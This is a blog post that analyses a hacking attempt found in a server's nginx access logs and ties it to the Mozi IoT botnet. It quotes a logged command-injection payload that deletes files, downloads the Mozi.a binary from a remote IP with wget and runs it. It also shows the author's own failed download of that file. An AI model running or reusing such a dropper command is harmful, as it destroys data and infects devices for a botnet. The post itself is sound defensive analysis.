Name + shaming malicious bots and actors
After looking through my nginx access logs, I realized it would be fun and insightful to show in the wild hacking attempts on this server.
Whenever I see interesting attempts, I'll post them here with the log entry and a brief description on what they were trying to accomplish, why it didn't work, and other interesting takeaways.
To start, here's a recent one:
120.59.127.164 - - [10/Sep/2020:19:00:49 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://120.59.127.164:52890/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 178 "-" "Hello, world"
Let's do some recon on our malicious friend. According to ipleak.net, the IP address seems to be located in India. Not very insightful information, but it's a start. No luck on VirusTotal either.
Looking at the URI string, the mozi.a file seemed like a good clue to chase. After a quick DuckDuckGo search, I quickly realized the mozi.a file actually relates to malware originating in late 2019.
According to CentryLink's NetNext blog, the malware appears to be targeting IOT devices. Here's a quick description of the bot/malware behavior:
The Mozi botnet is comprised of nodes that utilize a distributed hash table (DHT) for communication, similar to the code used by IoT Reaper and Hajime. These nodes also host the Mozi.m and Mozi.a malware binary files, passed during the compromise of new hosts, on a randomly chosen port. The standard DHT protocol is commonly used to store node contact information for torrent and other P2P clients. Using DHT allows the malware to bypass the use of standard malware command and control servers while hiding behind the large amount of typical DHT traffic. This makes it harder to track and impact the control infrastructure. As a P2P botnet, Mozi implements its own custom extended DHT described later.
Following URLhaus, it shows the hash of the file and a link to VirusTotal. It shows up as clearly malicious. Anyway, the intent of this was to drop malware and connect back to its C&C server. At the time of writing this, I attempted to download the file for analysis but was not able to:
# wget http://120.59.127.164:52890/Mozi.a
--2020-09-11 16:52:01-- http://120.59.127.164:52890/Mozi.a
Connecting to 120.59.127.164:52890... failed: Connection refused.
Firewalled off? Compromised server was cleaned? Who knows.
I wish I had the actual file because it would be fun to analyze if the C&C server was an old, most likely taken down by now server or a fresh one. Oh well, we'll leave that up to the pros like @malwrhunterteam.
This now begs the question of, was the request made by a compromised device, perhaps a member of the botnet itself? Considering the IP address came back clean in VirusTotal, maybe temporarily compromised.
After running an nmap scan (this blog hacks back! jk, but seriously), the scan came back with no open ports, so either their firewall is blocking the scan or they really don't have any ports open.
Why did the attempt fail?
The attack failed because the commands in the URI did not escape out into the shell to be executed. Kind of a bad attempt in my opinion, as they didn't even bother to try encoding their commands. Encoding technique examples can be seen on OWASP. Shout out to OWASP!